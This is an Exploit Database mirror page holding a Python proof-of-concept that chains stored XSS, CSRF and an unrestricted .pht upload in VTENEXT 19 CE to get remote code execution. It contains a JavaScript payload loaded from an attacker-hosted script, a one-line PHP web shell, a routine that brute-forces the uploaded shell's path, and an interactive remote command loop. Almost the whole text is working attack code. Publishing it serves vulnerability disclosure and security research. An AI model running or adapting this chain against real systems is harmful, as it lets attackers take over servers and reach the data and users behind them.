VTENEXT 19 CE – Remote Code Execution

• Exploit Database
• 113 阅读

• 作者： Marco Ruela
  日期： 2020-09-11
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48804/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  #!/usr/bin/python3   # Exploit Title: VTENEXT 19 CE - Remote Code Execution # Google Dork: n/a # Date: 2020/09/09 # Exploit Author: Marco Ruela # Vendor Homepage: https://www.vtenext.com/en/ # Software Link: Vendor removed vulnerable version from sourceforge.net # Version: 19 CE # Tested on: Ubuntu 16.04 # CVE : N/A # 2020/03/07 - Disclosed vulnerabilities to vendor # 2020/03/10 - Vendor committed to fix # 2020/09/09 - Public disclosure   # This script should be easy enough to follow. # We string together the three vulnerabilities to get RCE.   # XSS - The "From" field of the VTENEXT Messages module is vulnerable. # File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default . # CSRF - No CSRF protections in place.   # exploit.js needs to be hosted somewhere, IP&apos;s need to be replaced # check_csrf() should be changed based on your setup # run_shell() is a "nice to have"     # content of exploit.js """ function insertImage() { var xhr = new XMLHttpRequest(); xhr.open(&apos;POST&apos;,&apos;http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=&apos;,true); xhr.setRequestHeader(&apos;Content-type&apos;,&apos;multipart/form-data; boundary=---------------------------rekt&apos;); xhr.setRequestHeader(&apos;Content-Length&apos;, &apos;248&apos;); xhr.setRequestHeader(&apos;Referer&apos;, &apos;http://172.16.233.146/vtenext19ce/index.php&apos;); xhr.withCredentials = true; var body = &apos;-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\&apos;x\&apos;]); ?>\n\n-----------------------------rekt--&apos;;   var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); }   insertImage(); """   import smtplib import datetime import requests import os import time   base_url = "http://192.168.226.168/vtenext19ce/"   print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")     def build_url(): d = datetime.datetime.today() year = str(d.year) month = str(d.strftime("%B")) week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1]) tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/" return(tmp)   def build_mail(): _from= """&apos;<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >&apos;""" _to= "admin@example.com" _subject = "Important!" _body= "While you&apos;re reading this, a file is being uploaded to this server."   msg= "From: " + _from + "\n" msg += "To: " + _to + "\n" msg += "Subject: " + _subject + "\n\n" msg += _body return msg   def send_mail(): msg = build_mail() smtp_server = &apos;192.168.226.167&apos; smtp_port = 25   sender = &apos;user1@lab.local&apos; receiver = &apos;admin@lab.local&apos;   server = smtplib.SMTP(smtp_server, smtp_port) server.sendmail(sender, receiver, msg)   def check_csrf(): while True: is_there = os.popen(&apos;tail -n1 /var/log/apache2/access.log&apos;).read()   if "200" in is_there and "/exploit.js" in is_there and base_url in is_there: print("[>] CSRF triggered") break else: time.sleep(0.5) continue     def find_shell(): print("[>] Locating shell") time.sleep(1) tmp1 = build_url() for i in range(1, 9999): url = tmp1 + str(i) + "_shell.pht" r = requests.get(url) if r.status_code == 200: print("[>] Found the shell") print("[-] Location: " + url) return url else: continue   def run_shell(x): print("\n") while True: cmd = input("shell> ") if cmd == "exit": break else: url = x + "?x=" + cmd r = requests.get(url) print(r.text)     print("[>] Sending email") send_mail()   print("[-] Waiting for user to open mail")   check_csrf()   shell_location = find_shell()   run_shell(shell_location)     print("[!] Done!")